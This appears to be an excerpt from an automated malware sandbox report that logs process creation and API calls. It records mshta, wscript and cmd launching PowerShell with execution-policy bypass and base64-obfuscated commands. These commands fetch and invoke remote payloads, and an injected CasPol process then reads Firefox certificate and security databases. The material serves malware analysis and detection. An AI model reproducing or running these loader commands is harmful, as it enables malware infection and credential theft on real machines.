lkdlde1ldghvzcgnvkfjjyk7jhryaw5jb2xlam8usw52b2tlkcrudwxslcbakcd0ehquukvsvljtlza4ni8xnjeuntyumzkumjqxly86chr0accsicckyw5pbwfyjywgjyrhbmltyxinlcanjgfuaw1hcicsicddyxnqb2wnlcanjgfuaw1hcicsicckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlcckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlccxjywnjgfuaw1hcicpkts=';$desalinhadamente = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($biscato));invoke-expression $desalinhadamente
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $biscato = 'jhnvcnjlbmfyid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrlc2vyzgfyid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskzgvzyxzlc3nvid0gjgrlc2vyzgfylkrvd25sb2fkrgf0ysgkc29ycmvuyxipoyr0b21izwlybya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrkzxnhdmvzc28poyrjcmv0aw5pemfyid0gjzw8qkftrty0x1nuqvjupj4noyrnbgfuzhvsawzvcm1lid0gjzw8qkftrty0x0vord4+jzskz3jvc2egpsakdg9tymvpcm8usw5kzxhpzigky3jldgluaxphcik7jhryawdsb3r0axntbya9icr0b21izwlyby5jbmrlee9mkcrnbgfuzhvsawzvcm1lktskz3jvc2eglwdlidaglwfuzcakdhjpz2xvdhrpc21vic1ndcakz3jvc2e7jgdyb3nhics9icrjcmv0aw5pemfylkxlbmd0adskzgvzywjhzmfyid0gjhryawdsb3r0axntbyaticrncm9zytskc29mznjpdmvsbwvudgugpsakdg9tymvpcm8uu3vic3ryaw5nkcrncm9zyswgjgrlc2fiywzhcik7jgnvbnryywnhbwjpyxigpsatam9pbiaojhnvzmzyaxzlbg1lbnrlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrzb2zmcml2zwxtzw50zs5mzw5ndggpxtsky2f0yxjhy3rhid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygky29udhjhy2ftymlhcik7jgjhbwj1bgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhcmfjdgepoyr0cmluy29szwpvid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhryaw5jb2xlam8usw52b2tlkcrudwxslcbakcd0ehquukvsvljtlza4ni8xnjeuntyumzkumjqxly86chr0accsicckyw5pbwfyjywgjyrhbmltyxinlcanjgfuaw1hcicsicddyxnqb2wnlcanjgfuaw1hcicsicckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlcckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlccxjywnjgfuaw1hcicpkts=';$desalinhadamente = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($biscato));invoke-expression $desalinhadamente
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $biscato = 'jhnvcnjlbmfyid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrlc2vyzgfyid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskzgvzyxzlc3nvid0gjgrlc2vyzgfylkrvd25sb2fkrgf0ysgkc29ycmvuyxipoyr0b21izwlybya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrkzxnhdmvzc28poyrjcmv0aw5pemfyid0gjzw8qkftrty0x1nuqvjupj4noyrnbgfuzhvsawzvcm1lid0gjzw8qkftrty0x0vord4+jzskz3jvc2egpsakdg9tymvpcm8usw5kzxhpzigky3jldgluaxphcik7jhryawdsb3r0axntbya9icr0b21izwlyby5jbmrlee9mkcrnbgfuzhvsawzvcm1lktskz3jvc2eglwdlidaglwfuzcakdhjpz2xvdhrpc21vic1ndcakz3jvc2e7jgdyb3nhics9icrjcmv0aw5pemfylkxlbmd0adskzgvzywjhzmfyid0gjhryawdsb3r0axntbyaticrncm9zytskc29mznjpdmvsbwvudgugpsakdg9tymvpcm8uu3vic3ryaw5nkcrncm9zyswgjgrlc2fiywzhcik7jgnvbnryywnhbwjpyxigpsatam9pbiaojhnvzmzyaxzlbg1lbnrlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrzb2zmcml2zwxtzw50zs5mzw5ndggpxtsky2f0yxjhy3rhid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygky29udhjhy2ftymlhcik7jgjhbwj1bgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhcmfjdgepoyr0cmluy29szwpvid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhryaw5jb2xlam8usw52b2tlkcrudwxslcbakcd0ehquukvsvljtlza4ni8xnjeuntyumzkumjqxly86chr0accsicckyw5pbwfyjywgjyrhbmltyxinlcanjgfuaw1hcicsicddyxnqb2wnlcanjgfuaw1hcicsicckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlcckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlccxjywnjgfuaw1hcicpkts=';$desalinhadamente = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($biscato));invoke-expression $desalinhadamenteJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg0yicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzgqtdhlqzsagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrlrmloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiedqae1ttxzxr0thlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagbghtsyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagienrqkflwlqsdwludcagicagicagicagicagicagicagicagicagicagicagsunfy1jkzulvecxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihb6ehh6cg1jktsnicagicagicagicagicagicagicagicagicagicagicatbkfnzsagicagicagicagicagicagicagicagicagicagicagilp4ek5lww9hsndqiiagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicags3f6r2puicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakbti6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndiuotmunjuumtyxlzy4mc93zw5lzwrraxnzaw5nd2vsbg9uz2lybgzyawvuzhnozwjlyxv0awz1bgdpcmwudelgiiwijgvovjpbufbeqvrbxhdlbmvlzgtpc3npbmd3zwxsb25naxjsznjpzw5kc2hlymvhdxrpzi52ylmildasmck7u3rbunqtu0xfrxaomyk7awkgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcd2vuzwvka2lzc2luz3dlbgxvbmdpcmxmcmllbmrzagvizwf1dglmlnziuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $biscato = 'jhnvcnjlbmfyid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrlc2vyzgfyid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskzgvzyxzlc3nvid0gjgrlc2vyzgfylkrvd25sb2fkrgf0ysgkc29ycmvuyxipoyr0b21izwlybya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrkzxnhdmvzc28poyrjcmv0aw5pemfyid0gjzw8qkftrty0x1nuqvjupj4noyrnbgfuzhvsawzvcm1lid0gjzw8qkftrty0x0vord4+jzskz3jvc2egpsakdg9tymvpcm8usw5kzxhpzigky3jldgluaxphcik7jhryawdsb3r0axntbya9icr0b21izwlyby5jbmrlee9mkcrnbgfuzhvsawzvcm1lktskz3jvc2eglwdlidaglwfuzcakdhjpz2xvdhrpc21vic1ndcakz3jvc2e7jgdyb3nhics9icrjcmv0aw5pemfylkxlbmd0adskzgvzywjhzmfyid0gjhryawdsb3r0axntbyaticrncm9zytskc29mznjpdmvsbwvudgugpsakdg9tymvpcm8uu3vic3ryaw5nkcrncm9zyswgjgrlc2fiywzhcik7jgnvbnryywnhbwjpyxigpsatam9pbiaojhnvzmzyaxzlbg1lbnrlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrzb2zmcml2zwxtzw50zs5mzw5ndggpxtsky2f0yxjhy3rhid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygky29udhjhy2ftymlhcik7jgjhbwj1bgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhcmfjdgepoyr0cmluy29szwpvid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhryaw5jb2xlam8usw52b2tlkcrudwxslcbakcd0ehquukvsvljtlza4ni8xnjeuntyumzkumjqxly86chr0accsicckyw5pbwfyjywgjyrhbmltyxinlcanjgfuaw1hcicsicddyxnqb2wnlcanjgfuaw1hcicsicckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlcckyw5pbwfyjywnjgfuaw1hcicsjyrhbmltyxinlccxjywnjgfuaw1hcicpkts=';$desalinhadamente = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($biscato));invoke-expression $desalinhadamente
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00433E0A cpuid 32_2_00433E0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_004470AE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,32_2_004510BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_004511E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,32_2_004512EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,32_2_004513B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,32_2_00447597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,32_2_0040E679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,32_2_00450A7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_00450CF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_00450D42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_00450DDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,32_2_00450E6A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
